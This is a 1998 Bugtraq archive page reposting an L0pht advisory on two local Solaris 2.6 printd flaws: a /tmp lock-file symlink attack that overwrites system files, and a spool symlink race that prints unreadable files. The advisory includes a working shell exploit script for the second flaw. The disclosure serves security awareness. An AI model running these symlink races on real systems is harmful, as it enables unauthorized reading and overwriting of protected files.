Bugtraq mailing list archives
Solaris printd security vulnerability
From: aleph1 () dfw net (Aleph One)
Date: Wed, 11 Mar 1998 11:23:44 -0600
`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'` L0pht Security Advisory Document: L0pht Security Advisory URL Origin: http://www.l0pht.com/advisories.html Release Date: February 23, 1998 Application: printd (lp) Operating Sys: Solaris 2.6 Severity: Users can overwrite/create system files Users can print unreadable files Author: silicosis <sili () l0pht com> Patch Status: Sun has been made aware of the vulnerabilities 3 weeks ago and still has not released a patch. `'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'` Create/Overwrite Files: Sun hasn't learned from it's past mistakes; temp files are still a problem this time it's with 'printd' (lp). Upon printing a large file that sits in the queue for ~1minute, a lock file (/tmp/.printd.lock) is created. Before you print something large, create a symlink pointing to the /tmp/.printd.lock towards something you'd like to create/overwrite. When printd is done, the file your pointing to will have mode 640, and the contents will contain printd's pid. `````````````````````````` Printing unreadable files: Sun has restructured their print spooling in Solaris 2.6. They've gone over to a queueing system that's similar to sendmail: [~]lp .tcshrc [~]ls -al /var/spool/print total 12 drwxr-xr-x 2 root lp 512 Feb 20 12:44 . drwxrwxr-x 10 root bin 512 Feb 17 11:28 .. -rw-rw-r-- 1 root staff 4 Feb 20 12:44 .seq -rw-r----- 1 root staff 80 Feb 20 12:44 cfA037core lrwxrwxrwx 1 root staff 19 Feb 20 12:44 dfA037core -> /home/sili/.tcshrc -rw-r----- 1 root staff 23 Feb 20 12:44 xfA037core You have your control, transfer and datafiles. The datafile is just a symlink to the file you printed, so if you link the file you printed to something else *before* the queue is flushed, printd will print it. A simple exploit script: ----[CUT HERE: sol26lp]---- #!/bin/sh # #Print unreadable files on solaris2.6 #sili () l0pht com # # --If it didn't work, change $BIGFILE to # something bigger. # # --Script usually works 80% of the time.. # Didn't work? Try again.. Throw something # at the printspooler to slow it down. # TMPFILE="./.dmlr" BIGFILE="/usr/lib/libc.so.1" if [ $# != 1 ]; then echo "Usage:" echo echo "./sol26lp <file>" echo echo "Print unreadable files on Solaris2.6" echo " ----sili () l0pht com" exit 1 fi echo "Need a large file to print, using $BIGFILE." cp /usr/bin/vi $TMPFILE ; chmod 700 $TMPFILE lp $TMPFILE ; #sleep 1; rm $TMPFILE ; ln -s $1 $TMPFILE QF=`ls -al /var/spool/print |grep $TMPFILE |awk '{print $9}'` echo "Queue File: /var/spool/print/$QF" while [ -h /var/spool/print/$QF ]; do echo "Waiting for file to print"; sleep 1; done echo "File printed. Erasing temp files." rm $TMPFILE echo "Done." echo echo " --sili () l0pht com 1/20/98" ----[CUT HERE: sol26lp]----
Current thread:
- Security problem in Slackware., (continued)
- Security problem in Slackware. Suman_Saraf (Mar 11)
- Re: Security problem in Slackware. Peter van Dijk (Mar 13)
- /tmp event logger Michal Zalewski (Mar 14)
- Re: /tmp event logger Theo de Raadt (Mar 15)
- Vunerable shell scripts Michal Zalewski (Mar 14)
- More broadcast fun T. Freak (Mar 14)
- Midnight Commander /tmp race Michal Zalewski (Mar 15)
- Re: Midnight Commander /tmp race Pavel Kankovsky (Mar 17)
- Re: Midnight Commander /tmp race willy () SNOWYOWL CSU AC RU (Mar 17)
- Re: Midnight Commander /tmp race Pavel Kankovsky (Mar 18)
- Solaris printd security vulnerability Aleph One (Mar 11)
- Sun Security Bulletin #00165 Aleph One (Mar 11)
- Fwd: Sun Security Bulletin #00166 Tony Hagale (Mar 11)
- SLMail 2.6 DoS Steven (Mar 11)
- SLMail 2.6 DoS - Imail also Jon (Mar 11)
- Winsock 2.0 DoS John Robinson (Mar 11)
- Re: Winsock 2.0 DoS Henri Karrenbeld (Mar 12)
- more testing of Winsock 2.0 DoS Velocet (Mar 12)
- Re: Winsock 2.0 DoS stevep () ee pdx edu (Mar 12)
- InfoSecurity News jericho () DIMENSIONAL COM (Mar 13)
- Chase Bank joey.wheel (Mar 13)